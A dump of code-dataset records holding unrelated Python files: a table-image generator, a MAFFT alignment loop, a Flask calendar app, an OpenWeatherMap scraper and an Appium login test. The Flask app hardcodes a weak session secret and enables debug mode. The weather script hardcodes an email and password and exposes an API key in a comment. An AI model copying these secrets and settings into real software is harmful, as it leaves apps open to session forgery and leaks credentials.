col_width_dict:dict={}, row_height_dict:dict={}, cell_merge_dict:dict={},\n table_margin:int=20, pic_bk_color='#FFFFFF', table_line_color='#E8EAED', font_path:str=None):\n \"\"\"\n Generate the table picture.\n :param row_num: int,Number of rows in the table.\n :param col_num: int,Number of columns in the table.\n :param title_list: list, set the title information. Multiple titles can be set, and the information for each title stores in a dict. Example:\n [{'content': 'I am the main title'}, {'content': 'I am the subtitle'}]\n In this example, there are two titles. You can also specify the font size, color, alignment, and height for each title. For example:\n [{'content': 'I am the main title', 'font_size': 40, 'color': '#000000', 'align': 'center', 'height': 100}, {'content': 'I am the subtitle', 'align':'right'}]\n In this example, the main title has a custom font size, color, alignment, and height. The subtitle has a custom alignment.\n 'content' is a required key, other keys are optional. The default font size for the main title is 40, and 30 for the subtitle.\n The default height for the main title is 80, and 60 for the subtitle. The color is black, alignment is centered by default for all titles.\n :param header_dict: dict, set the information for the table header.\n Example 1: {'content': ['Header1', 'Header2', 'Header3']}\n In this example, there are 3 headers for the table. It doesn't mean you must have 3 columns, because you can combine the multiple columns as one header.\n The font size is 30, background color is '#CCD6EB', text color is white, and alignment is centered by default.\n\n Example 2: {'content': ['Header1', 'Header2', 'Header3'], 'font_size': 35, 'bk_color': '#000000', 'fore_color': '#FFFFFF', 'align': 'left'}\n In this example, it specifies the font size is 35, the background color is black, text color is white, and the alignment is left-aligned.\n\n If you like, you can specifies the particula header's font size, background color, text color, and alignment. For example:\n {'content': ['Header1', 'Header2', 'Header3'], 'bk_color': {0:'#FF0000',2:'#00FF00'}, 'fore_color': {1:'#0000FF'}, 'align': {1:'right'}}\n It specifies the first header's background color is red, and third header's background color is green. The other header's background color is '#CCD6EB' by default.\n The text color of the second header is blue, and other headers have a default text color of white. The alignment of the second header is right-aligned,\n other headers have a default alignment of centered.\n :param data_dict: dict, Set the information for the data content of the table.\n Example 1: {'content': [['A001', '123', '456'], ['A002', '234', '345']]}\n The data part is specified by a two-dimensional list. The first demension is the row, and the second dimension is the column. It should be noted that each element\n of the content must be a string type, even if it is a number.\n\n Like the header_dict, you can also specify the font size, background color, text color and the alignment for each row, column, even the cell.\n Example 2: {'content': [['A001', '123', '456'], ['A002', '234', '345']], 'bk_color': '#FFFFFF', 'fore_color': '#000000', 'align': 'right'}\n It specify the all data cell's background color is white, the text color is black, and the alignment is right-aligned.\n\n Example 3: {'content': ['A001', '123', '456'], ['A002', '234', '345']], 'bk_color': {'r0': '#FFFF00'}, 'fore_color': {'c1':'#00FF00'}, 'align': {'2-3':'left'}}\n It specify the first row's background color is yellow, the second column's text color is green, and the alignment of cell which in the third row and fourth column\n is left-aligned. 'r0' means 0-index row, 'c2' means 2-indexed column. '3-5' means the cell located in the fourth row and sixth column.\n :param img_path: Set the path for saving the image. If none then the image will not be saved.\n :param footnote_list: list, Optional parameter. Set the footnote information. The structure is the same as title_info. The default alignment\n is right-aligned, font size is 30, and height is 80 by default.\n :param cell_width: int, Optional parameter. Set the width of each cell. The default is 150.\n :param cell_height: int, Optional parameter. Set the height of each cell. The default is 50.\n :param col_width_dict: dict, Specify the width of individual columns. For example, {0: 200} specifies the width of the first column as 200.\n Other columns use the width specified by the parameter cell_width.\n\n :param row_height_dict: dict, Specify the height of individual rows. For example, {1: 80} specifies the height of the second row as 80.\n Other rows use the height specified by the parameter cell_height.\n\n :param cell_merge_dict: dict, contains the information of merging cells. For example, {'0-0': [1,0], '0-1': [0, 2]} indicates that the cell at coordinate [0,0] needs to be merged,\n by merging 1 row downward and 0 columns to the right (i.e., not merging columns); the cell at coordinate [0,1] needs to be merged, by merging\n 0 rows downward and 1 column to the right.\n :param pic_bk_color: str, optional parameter. Set the background color of the picture, default value is '#FFFFFF'.\n :param table_line_color: str, optional parameter. Set the line color of the table, default value is '#E8EAED'.\n :param font_path: str, optional parameter. Given the font path to set a new font for the text (including title, header, data).\n \"\"\"\n # Define default values\n __default_title_font_size = 40\n __default_footnote_font_size = 30\n __default_header_font_size = 30\n __default_data_font_size = 20\n __default_title_height = 80\n __default_footnote_height = 60\n __default_header_bk_color = '#CCD6EB'\n __default_title_color = '#000000'\n __default_footnote_color = '#000000'\n __default_title_align = 'center'\n __default_footnote_align = 'right'\n\n # Calculate the width for each column and the height for each row\n calc_col_width_dict, calc_row_height_dict = __calculate_data_cell_width_height(row_num, data_dict, font_path, cell_width, cell_height)\n calc_col_width_dict.update(col_width_dict)\n calc_row_height_dict.update(row_height_dict)\n\n color_white = '#FFFFFF'\n color_black = '#000000'\n\n title_list = __process_title_footnote(title_list, __default_title_align, __default_title_font_size, __default_title_height, __default_title_color)\n footnote_list = __process_title_footnote(footnote_list, __default_footnote_align, __default_footnote_font_size, __default_footnote_height, __default_footnote_color)\n total_title_height = sum([title['height'] for title in title_list])\n total_footnote_height = sum([footnote['height'] for footnote in footnote_list])\n max_title_footnote_width = __get_max_width_title_footnote(title_list, footnote_list, font_path)\n cell_pos_list, table_pos = generate_table_rec_coord(row_num, col_num, start_pos=[table_margin, total_title_height], cell_width=cell_width, cell_height=cell_height,\n col_width_dict=calc_col_width_dict, row_height_dict=calc_row_height_dict, cell_merge_dict=cell_merge_dict,)\n\n # if the title is longer the table, need to adjust the table pos.\n if table_pos[2] < max_title_footnote_width:\n # print(table_pos, max_title_footnote_width)\n diff = (max_title_footnote_width - table_pos[2]) // 2 + 5\n # print(diff)\n new_cell_pos_list = []\n # update the cell rectangle coordinates(only for x axis).\n for rec_pos in cell_pos_list:\n new_cell_pos_list.append([x+diff if idx % 2 == 0 else x for idx, x in enumerate(rec_pos)])\n # update the total table pos\n new_table_pos = [x+diff if idx % 2 == 0 else x for idx, x in enumerate(table_pos)]\n # print(new_table_pos)\n cell_pos_list = new_cell_pos_list\n table_pos = new_table_pos\n\n\n pic_width = max(table_pos[2], max_title_footnote_width) + table_margin\n pic_height = table_pos[3] + table_margin + total_footnote_height\n\n image = Image.new('RGB', (pic_width, pic_height), pic_bk_color)\n draw = ImageDraw.Draw(image)\n draw.rectangle(table_pos, fill=table_line_color)\n\n # Draw Title\n tp_dict = {}\n for idx, title in enumerate(title_list):\n title_rec_coord = [0, tp_dict.get(idx-1, 0), pic_width, title['height'] + tp_dict.get(idx-1, 0)]\n tp_dict[idx] = title_rec_coord[3]\n title_font = get_font(font_path, title['font_size'])\n title_coord = get_content_pos(title_rec_coord, title['content'], title_font, title['align'])\n draw.text(title_coord, title['content'], font=title_font, fill=title['color'])\n\n # Draw Header\n for idx, header_content in enumerate(header_dict['content']):\n header_rec_pos = cell_pos_list[idx]\n header_font = get_font(font_path, header_dict.get('font_size', __default_header_font_size)) \\\n if type(header_dict.get('font_size', __default_header_font_size)) == int \\\n else get_font(font_path, header_dict['font_size'].get(idx, __default_header_font_size))\n header_coord = get_content_pos(header_rec_pos, header_content, header_font, header_dict.get('align', 'center')) \\\n if type(header_dict.get('align', 'center')) == str \\\n else get_content_pos(header_rec_pos, header_content, header_font, header_dict['align'].get(idx, 'center'))\n draw.rectangle(header_rec_pos, fill=header_dict.get('bk_color', __default_header_bk_color)) \\\n if type(header_dict.get('bk_color', __default_header_bk_color)) == str \\\n else draw.rectangle(header_rec_pos, fill=header_dict['bk_color'].get(idx, __default_header_bk_color))\n header_fore_color = header_dict.get('fore_color', color_black) \\\n if type(header_dict.get('fore_color', color_black)) == str \\\n else header_dict['fore_color'].get(idx, color_black)\n draw.text(header_coord, header_content, font=header_font, fill=header_fore_color)\n\n # Draw Data\n for i, data_line in enumerate(data_dict['content']):\n for j, data_content in enumerate(data_line):\n data_rec_coord = cell_pos_list[idx + 1 + (i * col_num) + j]\n data_rec_bk_color = __get_data_info(data_dict, 'bk_color', i, j, color_white, str)\n draw.rectangle(data_rec_coord, fill=data_rec_bk_color)\n data_font = get_font(font_path, __get_data_info(data_dict, 'font_size', i, j, __default_data_font_size, int))\n data_coord = get_content_pos(data_rec_coord, data_content, data_font, __get_data_info(data_dict, 'align', i, j, 'center', str))\n draw.text(data_coord, data_content, font=data_font, fill=__get_data_info(data_dict, 'fore_color', i, j, color_black, str))\n\n # Draw footnote\n tp_dict = {-1: table_pos[3] + table_margin}\n for idx, footnote in enumerate(footnote_list):\n footnote_rec_coord = [0, tp_dict[idx-1], pic_width, footnote['height'] + tp_dict[idx-1]]\n tp_dict[idx] = footnote_rec_coord[3]\n footnote_font = get_font(font_path, footnote['font_size'])\n footnote_coord = get_content_pos(footnote_rec_coord, footnote['content'], footnote_font, footnote['align'])\n draw.text(footnote_coord, footnote['content'], font=footnote_font, fill=footnote['color'])\n if img_path:\n image.save(img_path)\n else:\n return image\n\n\ndef combine_multiple_pic(combine_path:str, path_list:list=None, img_list:list=None, pic_bk_color:str='#FFFFFF'):\n \"\"\"\n Combine multiple pictures into one\n :param pic_path_list: list, the list of picture's path\n :param combine_pic_path: str, the path of combined picture\n \"\"\"\n total_width = 0\n total_height = 0\n if path_list is None and img_list is None:\n raise Exception('Please specify the path_list or img_list!')\n elif path_list:\n img_list = []\n for path in path_list:\n img = Image.open(path)\n img_list.append(img)\n total_width = max(total_width, img.width)\n total_height += img.height\n elif img_list:\n total_width = max([img.width for img in img_list])\n total_height = sum([img.height for img in img_list])\n\n combine_img = Image.new('RGB', (total_width, total_height), pic_bk_color)\n start_height = 0\n for img in img_list:\n combine_img.paste(img, ((total_width-img.width)//2, start_height))\n start_height += img.height\n combine_img.save(combine_path)\n\n\n\n\n","repo_name":"slash-xin/tablepic","sub_path":"src/tablepic/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":20398,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"1905288470","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 1 22:01:49 2018\n\n@author: Jiaqi Li\n\"\"\"\n\nimport numpy\nfrom scipy import *\nimport Bio\nfrom Bio.Align.Applications import MafftCommandline\n\na = linspace(1,100,100)\n\ni = 0\nwhile i < 100:\n print('Now running sample%d' %(a[i]))\n mafft_exe = \"D:\\\\MAFFT\\\\mafft-7.380-win64-signed\\\\mafft-win\\\\mafft.bat\"\n in_file = \"D:\\\\Research\\\\100_samples\\\\100_samples\\\\sample_shuffle_again%d.txt\" %(a[i])\n mafft_cline = MafftCommandline(mafft_exe, input=in_file)\n print(mafft_cline)\n stdout, stderr = mafft_cline()\n with open(\"aligned_sample_shuffled%d.fasta\" %(a[i]), \"w\") as handle:\n handle.write(stdout)\n from Bio import AlignIO\n align = AlignIO.read(\"aligned_sample_shuffled%d.fasta\" %(a[i]), \"fasta\")\n i += 1","repo_name":"JohnnyBarber/Phylogenetic-Research-Project","sub_path":"mafft_python_encoding.py","file_name":"mafft_python_encoding.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4034229784","text":"\"\"\"\ncalendarize Flask application file\n\nThe code for this project loosely follows PEP 8 style guidelines.\nYou can read about them here: https://www.python.org/dev/peps/pep-0008/\nAny code that does not comply will be modified to do so if possible.\nIf you're using PyCharm, it will have built-in PEP8 linting,\nand similar packages should be available for other editors.\n\nLinks to documentation for the packages used can be found\nin the GitHub repository README.md\n\n\"\"\"\nimport logging\nimport json, string, re, random\nimport pytz\n# from pytz import timezone\nfrom datetime import datetime, date\nfrom classes import db_queries as db\nfrom flask import Flask, flash, render_template, session, g, request, url_for, redirect, safe_join\nfrom flask_mobility import Mobility\nfrom flask_mobility.decorators import mobile_template\nfrom classes.user import User\nfrom flask_login import *\nfrom flask_login import login_user, current_user\nfrom funcs.logIn import check_password, hash_password\nfrom funcs.logIn import login_func\nfrom funcs import file_tools\nfrom flask_mail import Mail, Message\nfrom funcs.file_tools import load_file\nfrom funcs.send_email import *\nfrom funcs.reset import *\n\n# app initialization\napp = Flask(__name__)\nMobility(app)\n\n# config setup\napp.config['DEBUG'] = True # Testing only\n\n# needed for session cookies\napp.secret_key = 'hella secret'\nmail = Mail(app)\n\n# initialization of login manager\n# it keeps the given user logged in via use of cookies\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\nlogin_manager.login_view = '/'\n\n# stores returned user into current session\n@login_manager.user_loader\ndef load_user(email):\n \"\"\"Returns an object of class User based on provided unique identifier\n if user in the database, otherwise None\n \"\"\"\n if user_exists(email):\n return User(email)\n return None\n\n\ndef setup_logging():\n \"\"\"\n \"\"\"\n try:\n lg = logging.getLogger(__name__)\n lg.setLevel(logging.INFO)\n handler = logging.FileHandler(filename='calendarize.log', encoding='utf-8', mode='a')\n fmt = logging.Formatter('[%(asctime)s]:%(module)s:%(levelname)s: %(message)s', datefmt='%H:%M:%S')\n handler.setFormatter(fmt)\n lg.addHandler(handler)\n return lg\n except PermissionError as e:\n print('{}\\n'\n 'WARNING: Logging not enabled.\\n'\n 'If you get this error, change your IDE working directory.\\n'\n 'The application will still work, but nothing will be logged.'.format(e))\n # In PyCharm, go to Run>Edit Configuration to set the working directory to the calendarize folder.\n\n\ndef end_logging(log):\n \"\"\"\n \"\"\"\n handlers = log.handlers[:]\n for hdlr in handlers:\n hdlr.close()\n log.removeHandler(hdlr)\n\n\nlogger = setup_logging()\n\n\n@app.before_request\ndef prequest():\n log_basic()\n\n\ndef request_data(req):\n \"\"\"\n \"\"\"\n res = '{} requested by {}'.format(req.url, req.remote_addr)\n return res\n\n\ndef log_basic():\n \"\"\"\n \"\"\"\n # This handles logging of basic data that should be logged for all requests\n if logger:\n logger.info(request_data(request))\n\n\n# It should be moved to a separate file if there\n# ends up being more functions like this one\ndef user_exists(email):\n \"\"\"Returnes True if user with provided identifier exists,\n otherwise False\n \"\"\"\n with db.ConnectionInstance() as queries:\n if queries.get_user_id(email) is None:\n return False\n return True\n\n\n\n##################################################################\n\n# Some of the routes below might warrant moving out and\n# into separate files, but until the scope of the operations\n# that need to be performed are clear, they stay here\n# as a skeleton for easy reference.\n# #################################################################\n\n@app.route('/')\n@mobile_template('/{mobile/}index.html')\ndef index(template):\n \"\"\"\n \"\"\"\n# from classes.dummy_classes import ShardTestingClass\n# for i in range(0, 5):\n# with ShardTestingClass(app) as st:\n# print(app.config['shards'])\n# st.work()\n# print(app.config['shards'])\n if (current_user.is_authenticated):\n return redirect('/index_user')\n return render_template(template)\n\n\n@app.route('/index_user')\n@mobile_template('/{mobile/}index_user.html')\n@login_required\ndef index_user(template):\n \"\"\"\n \"\"\"\n# from classes.dummy_classes import ShardTestingClass\n# for i in range(0, 5):\n# with ShardTestingClass(app) as st:\n# print(app.config['shards'])\n# st.work()\n# print(app.config['shards'])\n displayed_name = current_user.name if current_user.name else current_user.email\n return render_template(template, name=displayed_name)\n\n\n@app.route('/user_availability', methods=['GET', 'POST'])\ndef user_availability():\n \"\"\"\n \"\"\"\n if request.method == \"POST\":\n email = request.form['inputEmail']\n if email and user_exists(email):\n return 'false'\n return 'true'\n return redirect('/')\n\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n \"\"\"\n \"\"\"\n if request.method == \"POST\":\n # read the posted values from the UI\n email = request.form.get('inputEmail', None)\n password = request.form.get('inputPassword', None)\n # validate received values\n if email and password and not user_exists(email):\n with db.ConnectionInstance() as queries:\n key = random_key(10) + email[:5]\n # TODO delete or merge previously created user if exists\n #adds new user to the database\n added = queries.add_user(datetime.utcnow(), email, hash_password(password),key)\n if (added):\n user = User(email)\n #adds default calendar to that user\n queries.add_calendar(datetime.utcnow(), user.user_id)\n #send verfication email\n send_verification(email,key)\n return render_template(\"verify_send.html\", email=email)\n # reload if something not right\n # TODO maybe some error messages\n return redirect('/')\n\n\n@app.route('/verify_credentials', methods=['GET', 'POST'])\ndef verify_credentials():\n \"\"\"\n \"\"\"\n if request.method == \"POST\":\n email = request.form['inputEmail']\n password = request.form[\"inputPassword\"]\n if email and user_exists(email) and check_password(password, email):\n return 'true'\n return 'false'\n return redirect('/')\n\n\n@app.route(\"/login\", methods=['GET', 'POST'])\ndef login():\n \"\"\"\n \"\"\"\n if request.method == \"POST\":\n password = request.form[\"inputPassword\"]\n email = request.form[\"inputEmail\"]\n user = load_user(email)\n if user is not None:\n if not user.is_active():\n return render_template(\"verify_option.html\", email=email)\n if check_password(password, email) and user.is_active():\n if 'remember' in request.form and request.form[\"remember\"] == 'on':\n remember_me = True\n else:\n remember_me = False\n login_user(user, remember=remember_me)\n return redirect('/index_user')\n return redirect('/')\n\n\n@app.route(\"/logout\")\n@login_required\ndef logout():\n \"\"\" Logs user out and redirects to main page\n \"\"\"\n logout_user()\n # TODO redirect to: you have been successfully logged out\n return redirect('/')\n\n\n@app.route(\"/recover/\", methods=[\"GET\", \"POST\"])\ndef recover():\n if request.method==\"POST\":\n email = request.form.get(\"email\", None)\n if not email:\n flash(\"You need to fill out an email!\")\n return redirect(url_for('recover'))\n if user_exists(email):\n send_recover(email)\n return render_template(\"recoverconfirm.html\",email=email)\n else:\n return render_template(\"recoverconfirm.html\",email=email)\n return render_template(\"recover.html\")\n\n\n@app.route(\"/reset/\", methods=[\"GET\", \"POST\"])\ndef reset(resetkey):\n with db.ConnectionInstance() as queries:\n email = queries.get_reset_info(resetkey)\n if email:\n if request.method ==\"POST\":\n if reset_password(email):\n return render_template(\"resetsuccess.html\")\n return render_template(\"reset.html\")\n else:\n return render_template(\"invalidlink.html\")\n\n@app.route('/calendar')\n@mobile_template('/{mobile/}calendar.html')\n@login_required\ndef calendar(template):\n \"\"\"\n \"\"\"\n log_basic()\n with db.ConnectionInstance() as queries:\n invites = queries.get_user_invites(current_user.user_id)\n invites = len(invites) if invites else 0\n displayed_name = current_user.email if current_user.name is None else current_user.name\n return render_template(template, name=displayed_name, notifier=invites)\n\n\n@app.route('/side/')\n@login_required\ndef load_sidebar(path):\n safe_path = safe_join('sidebar', path + '.html')\n log_basic()\n if path == 'notifications':\n with db.ConnectionInstance() as queries:\n invites = queries.get_user_invites(current_user.user_id)\n return render_template(safe_path, notifications=invites)\n if path == 'display_profile':\n with db.ConnectionInstance() as queries:\n phone = queries.get_user_data(current_user.user_id)\n name = current_user.name if current_user.name else current_user.email\n return render_template(safe_path, name=name, email=current_user.email, phone=phone)\n return render_template(safe_path)\n\n\n@app.route('/get_data')\n@login_required\ndef get_data():\n \"\"\"\n \"\"\"\n with db.ConnectionInstance() as queries:\n calendar_ids = queries.get_calendars(current_user.user_id)\n cal_details = queries.get_calendars_details(calendar_ids)\n event_details = queries.get_events_details(calendar_ids)\n return json.dumps([cal_details, event_details], default=type_handler)\n\n\n# helper function, should be moved\ndef type_handler(x):\n if isinstance(x, (date, datetime)):\n x = pytz.utc.localize(x)\n # TODO if desired timezone set use this line:\n # x = x.astimezone(tz)\n return x.isoformat()\n elif isinstance(x, bytearray):\n return x.decode('utf-8')\n raise TypeError(\"Unknown type\")\n\n\n@app.route('/uploads/')\n@login_required\ndef uploaded_file(filename):\n eid = request.args.get('id')\n with db.ConnectionInstance() as queries:\n cal = queries.get_event_calendar_id(eid)\n role = queries.get_calendar_role(current_user.user_id, cal)\n if role is not None:\n return load_file(filename, eid)\n # return redirect(url_for('error'))\n\n\n@app.route('/add_calendar', methods=['POST', 'GET'])\n@login_required\ndef add_calendar():\n if request.method == \"POST\":\n cal_name = request.form.get('newCalendarName', None)\n cal_color = request.form.get('color', None)\n if cal_name and cal_color and len(cal_name) < 45 and len(cal_color) == 7:\n with db.ConnectionInstance() as queries:\n new_cal_id = queries.add_calendar(datetime.utcnow(), current_user.user_id, cal_name, cal_color[1:])\n if new_cal_id:\n # parse 'invites' string and send invites\n invites = re.sub( '\\s+', ' ', request.form.get('invites', '')).strip()\n invites = re.split(',| |;', invites)\n for email in invites:\n if '@' in email and queries.check_invite(email, new_cal_id):\n role = 3 # 0: owner, 1: admin, 2: contributor, 3: user\n queries.send_invite(new_cal_id, queries.get_user_id(email), current_user.user_id, role,email)\n sender = current_user.name if current_user.name else current_user.email\n # send email to email\n send_invite(sender,email,cal_name)\n return 'true'\n return 'false'\n\n\n@app.route('/request_calandar', methods=['POST', 'GET'])\n@login_required\ndef request_calandar():\n if request.method == \"POST\":\n cal_id = request.form.get('cal_id', None)\n if cal_id:\n with db.ConnectionInstance() as queries:\n role = queries.get_calendar_role(current_user.user_id, cal_id)\n if role is not None:\n cal_data = queries.get_calendars_details((cal_id,))[0]\n return json.dumps({'success' : 'true', 'data' : json.dumps(cal_data, default=type_handler)})\n return json.dumps({'success' : 'false'})\n\n\n@app.route('/join_calander', methods=['POST', 'GET'])\n@login_required\ndef join_calander():\n if request.method == 'POST':\n id = request.form.get(\"calendar_id\", None)\n role = request.form.get(\"role\", None)\n with db.ConnectionInstance() as q:\n if q.check_for_invite(current_user.user_id, id, role) == True:\n q.join_calander(id, current_user.user_id, role)\n return 'true'\n return 'false'\n\n\n@app.route('/decline_calander', methods=['POST', 'GET'])\n@login_required\ndef decline_calander():\n if request.method == 'POST':\n id = request.form.get(\"calendar_id\", None)\n role = request.form.get(\"role\", None)\n with db.ConnectionInstance() as q:\n if q.check_for_invite(current_user.user_id, id, role) == True:\n return 'true'\n return 'false'\n\n\n@app.route('/invite_calendar', methods=['POST', 'GET'])\n@login_required\ndef invite_calander():\n if request.method == 'POST':\n email = request.form.get(\"email\", None)\n if len(email) > 45:\n return 'false'\n calendar_id = request.form.get(\"calendar_id\", None)\n role = request.form.get(\"role\", None)\n with db.ConnectionInstance() as q:\n if q.get_calendar_role(current_user.user_id, calendar_id) == 0 and q.check_invite(email, calendar_id):\n q.send_invite(calendar_id, q.get_user_id(email), current_user.user_id, role, email)\n return 'true'\n return 'false'\n\n\n@app.route('/leave_calander', methods=['POST', 'GET'])\n@login_required\ndef leave_calander():\n if request.method == 'POST':\n id = request.form.get(\"calender_id\", None)\n with db.ConnectionInstance() as q:\n q.leave_calander(id, current_user.user_id)\n return 'true'\n return 'false'\n\n\n@app.route('/add_event', methods=['POST', 'GET'])\n@login_required\ndef add_event():\n if request.method == \"POST\":\n data = request.form.to_dict()\n print(data)\n if 'newEventName' in data and 'calendarID' in data:\n try:\n data['startDate'] = datetime.utcfromtimestamp(int(data['startDate'])/1000.0)\n except:\n return json.dumps({'success' : 'false', 'message': 'date'})\n try:\n data['endDate'] = datetime.utcfromtimestamp(int(data['endDate'])/1000.0)\n if data['endDate'] < data['startDate']:\n data['endDate'] = data['startDate']\n except:\n data['endDate'] = data['startDate']\n with db.ConnectionInstance() as queries:\n role = queries.get_calendar_role(current_user.user_id, data['calendarID'])\n if role is not None and role == 0:\n eid = queries.add_event(data, datetime.utcnow(), current_user.user_id)\n if eid:\n success = [queries.add_file(file, eid) for file in request.files.getlist('file')]\n return json.dumps({'success' : 'true', 'id': eid, 'files': success})\n return json.dumps({'success' : 'false'})\n\n\n@app.route('/add_files', methods=['POST'])\n@login_required\ndef add_files():\n with db.ConnectionInstance() as q:\n for file in request.files:\n success = q.add_file(request.files[file], request.form['event_id'])\n if not success:\n # TODO handle what happens if the file fails to upload\n pass\n return 'true'\n\n\n@app.route('/update_profile', methods=['POST'])\n@login_required\ndef update_profile():\n log_basic()\n if request.method == \"POST\":\n name = request.form.get('name', None)\n name = current_user.name if name == '' or name == None else name\n try:\n phone = int(request.form['phone'])\n except:\n phone = None\n if name and len(name) < 45:\n with db.ConnectionInstance() as queries:\n if queries.update_user(current_user.user_id, name, phone):\n return 'true'\n return 'false'\n\n\n##################################################################\n# DELETION FUNCTIONS - emphasized because these not working\n# properly is not good. Make sure to test properly.\n# TODO remove emphasis only after these functions are tested\n# TODO errors and error handling\n\n\n@app.route('/delete_user')\n@fresh_login_required\ndef delete_user():\n with db.ConnectionInstance() as queries:\n queries.db_del_user(current_user.user_id)\n logout_user()\n # TODO redirect to user has been deleted page\n return redirect(url_for('index'))\n\n\n@app.route('/delete_event', methods=['POST', 'GET'])\n@fresh_login_required\ndef delete_event():\n if request.method==\"POST\":\n event = request.form.get('event_id', None)\n if event:\n with db.ConnectionInstance() as queries:\n cal = queries.get_event_calendar_id(event)\n role = queries.get_calendar_role(current_user.user_id, cal)\n if role is not None and role == 0:\n queries.db_del_event(event)\n # TODO delete files\n # TODO delete children\n return 'true'\n return 'false'\n\n\n@app.route('/delete_calendar', methods=['POST', 'GET'])\n@fresh_login_required\ndef delete_cal():\n if request.method==\"POST\":\n cal = request.form.get('calendar_id', None)\n if cal:\n with db.ConnectionInstance() as queries:\n role = queries.get_calendar_role(current_user.user_id, cal)\n if role is not None and role == 0:\n queries.db_del_cal(cal)\n return 'true'\n return 'false'\n\n\n@app.route(\"/verify/\", methods=[\"GET\", \"POST\"])\ndef verify(verify_key):\n with db.ConnectionInstance() as queries:\n email = queries.get_verify_info(verify_key)\n if email:\n with db.ConnectionInstance() as queries:\n queries.activate_user(email)\n user = load_user(email)\n login_user(user)\n return render_template(\"verify_confirm.html\")\n else:\n return (\"Your account has been already verified or the link has been expired\")\n\n\n@app.route(\"/verifyoption\", methods=[\"GET\", \"POST\"])\ndef verifyoption():\n email = request.form.get(\"email\", None)\n user = load_user(email)\n if email:\n key = random_key(10) + email[:5]\n with db.ConnectionInstance() as queries:\n queries.make_verifykey(user.user_id,key)\n send_verification(email,key)\n return render_template(\"verify_send.html\", email=email)\n\n\ndef start():\n app.run()\n\n@app.route(\"/verifytesting\")\ndef vtest():\n return render_template(\"verify.html\", email='thisisemail')\n\n\n\n##################################################################\n\n\nif __name__ == '__main__':\n start()\n","repo_name":"dat210a/calendarize","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":19623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30342868346","text":"from grab import Grab\r\nfrom lxml import html\r\nimport urllib.request\r\nimport gzip\r\nimport json\r\nimport sqlite3\r\nimport os\r\nimport datetime\r\n\r\nusername = 'ostrowsky'\r\nemail = 'ostrowskyi@gmail.com'\r\npassword = password_confirmation = 'want_to_get_weather'\r\n\r\n'''\r\ng = Grab()\r\ng.go('https://home.openweathermap.org/users/sign_up')\r\ng.set_input_by_id('user_username', username)\r\ng.set_input_by_id('user_email', email)\r\ng.set_input_by_id('user_password', password)\r\ng.set_input_by_id('user_password_confirmation', password_confirmation)\r\ng.set_input_by_id('user_agreement', 'True')\r\ng.submit()\r\nprint(g.response, g.response.body)\r\n\r\ng = Grab()\r\ng.go('https://home.openweathermap.org/api_keys')\r\ng.set_input_by_id('user_email', email)\r\ng.set_input_by_id('user_password', password)\r\ng.set_input_by_id('user_remember_me', 'True')\r\ng.submit()\r\napp_id = g.xpath_text('/html/body/div[3]/div[5]/div[3]/div[1]/table/tbody/tr/td[1]/pre')\r\nwith open('app.id', 'w', encoding='UTF-8') as f:\r\n f.write(app_id)\r\n\r\n\r\nf = urllib.request.urlopen('http://bulk.openweathermap.org/sample/city.list.json.gz')\r\ns = f.read()\r\nwith open('city.list.json.gz', 'wb') as arch:\r\n arch.write(s)\r\n\r\nwith gzip.open('city.list.json.gz', 'r') as arch:\r\n archive_content = arch.read()\r\n\r\n\r\nwith open('city.list.json', 'wb') as json_content:\r\n json_content.write(archive_content)\r\n'''\r\n\r\nwith open('app.id', 'r', encoding='UTF-8') as f:\r\n app_id = f.read()\r\n\r\ndb_filename = 'db_weather'\r\nconn = sqlite3.connect(db_filename)\r\nconn.close()\r\n#os.remove(db_filename)\r\n\"\"\"\r\nwith sqlite3.connect(db_filename) as conn:\r\n conn.execute('''\r\n create table weather (\r\n id_города INTEGER PRIMARY KEY,\r\n Город VARCHAR(255),\r\n Дата DATE,\r\n Температура INTEGER,\r\n id_погоды INTEGER\r\n );\r\n ''')\r\n\"\"\"\r\n\r\nwith open('city.list.json', 'rb') as json_file:\r\n for line in json_file:\r\n encoded_line = json_file.readline()\r\n decoded_line = encoded_line.decode('utf-8')\r\n city = json.loads(decoded_line)\r\n city_id = city['_id']\r\n name = city['name']\r\n print(city['country'])\r\n date = datetime.date.today()\r\n query = 'http://api.openweathermap.org/data/2.5/weather?id={}&units=metric&appid={}'.format(city['_id'], app_id)\r\n request = urllib.request.urlopen(query)\r\n response = request.read()\r\n response_decoded = response.decode('utf-8')\r\n json_line = json.loads(response_decoded)\r\n temp = json_line['main']['temp']\r\n temp_id = json_line['weather'][0]['id']\r\n\r\n \"\"\"\r\n with sqlite3.connect(db_filename) as conn:\r\n conn.execute('''\r\n insert into weather (id_города, Город, Дата, Температура, id_погоды) VALUES (?,?,?,?,?)''', (\r\n city_id, name, date, temp, temp_id\r\n )\r\n )\r\n\r\n \"\"\"\r\n\r\n\r\n\r\n # g = Grab()\r\n # g.go('http://api.openweathermap.org/data/2.5/weather?id=524901&units=metric&appid=5ed63d7796f30a5f84cf735eed9af7e1')\r\n #print(g.response, g.response.body)\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"ostrowsky/Parcer","sub_path":"Py8/Py8.py","file_name":"Py8.py","file_ext":"py","file_size_in_byte":3153,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"20043377609","text":"# urs/bin/python\r\n# encoding:utf-8\r\n\r\nimport time\r\nfrom selenium.webdriver.common.by import By\r\nfrom base.baseOperate import Commom as c\r\nfrom psam.psam import Psam\r\nclass Login(object):\r\n \r\n def __init__(self,driver, username, pwd):\r\n self.username = username\r\n self.pwd = pwd\r\n self.driver = driver\r\n \r\n def loginAction(self):\r\n \r\n try:\r\n \r\n self.driver.reset()\r\n \r\n time.sleep(8)\r\n \r\n c.waitForElement(self.driver, By.XPATH, r\"//android.widget.ImageView[@index='0']\").click()\r\n # 输入\r\n els = self.driver.find_elements_by_id('cn.cj.pe:id/input')\r\n print('输入')\r\n els[0].send_keys(self.username)\r\n \r\n print('输入')\r\n els[1].send_keys(self.pwd)\r\n \r\n print('点击登录')\r\n 